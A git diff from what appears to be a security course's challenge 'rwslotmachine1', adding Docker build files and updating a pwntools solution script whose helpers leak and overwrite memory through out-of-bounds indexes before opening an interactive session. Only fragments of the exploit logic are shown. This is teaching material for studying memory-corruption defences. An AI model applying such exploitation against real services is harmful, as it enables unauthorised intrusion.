diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile new file mode 100644 index 0000000..2c28e2f --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile @@ -0,0 +1,21 @@ +# Stage 1: Build Stage +FROM gcc:latest AS build + +WORKDIR /app + +COPY rwslotmachine1.c . +COPY Makefile.sol Makefile + +RUN make + +# Stage 2: Runtime Stage +FROM ubuntu:latest + +WORKDIR /app + +COPY --from=build /app/rwslotmachine1 /app/rwslotmachine1 + +EXPOSE 31344 + +# Run the application +CMD ["./rwslotmachine1"] diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile new file mode 100644 index 0000000..29467e2 --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile @@ -0,0 +1,19 @@ +IMAGE_NAME = ransomware1 +CONTAINER_NAME = ransomware1_container +PORT = 31344 + +# Build the Docker image +build: + docker build -t $(IMAGE_NAME) . + +# Run the Docker container +run: + docker run -it --rm -p $(PORT):$(PORT) --name $(CONTAINER_NAME) $(IMAGE_NAME) + +# Stop the Docker container +stop: + docker stop $(CONTAINER_NAME) + +# Clean up the Docker image +clean: + docker rmi $(IMAGE_NAME) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol new file mode 100644 index 0000000..bc71ca9 --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Makefile.sol @@ -0,0 +1,13 @@ +CC = gcc +CFLAGS = -Wall -Wextra -O2 + +TARGET = rwslotmachine1 +SRC = rwslotmachine1.c + +all: $(TARGET) + +$(TARGET): $(SRC) + $(CC) $(CFLAGS) -o $(TARGET) $(SRC) + +clean: + rm -f $(TARGET) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py index 40d3c52..e2eab64 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py @@ -1,6 +1,6 @@ from pwn import * -local = False +local = True # Both solutions work against the Docker container instance. # Only solution 2 works locally. # Solution 1 fails on the local machine because there is no valid address at that index. @@ -13,21 +13,23 @@ def do_read(idx): - p.recvuntil(">") - p.sendline("1") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("]: ") - return int(p.recvuntil("\n")[:-1], 16) + p.recvuntil(b">") + p.sendline(b"1") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"]: ") + leak = p.recvline().strip() + print(f"Raw Leak: {leak}") + return int(leak, 16) def do_write(idx, value): - p.recvuntil(">") - p.sendline("2") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("value:") - p.sendline(hex(value)) + p.recvuntil(b">") + p.sendline(b"2") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"value:") + p.sendline(hex(value).encode()) if SOLUTION == 1: @@ -45,4 +47,4 @@ def do_write(idx, value): do_write(-8, stack_slots) -p.interactive() +p.interactive() \ No newline at end of file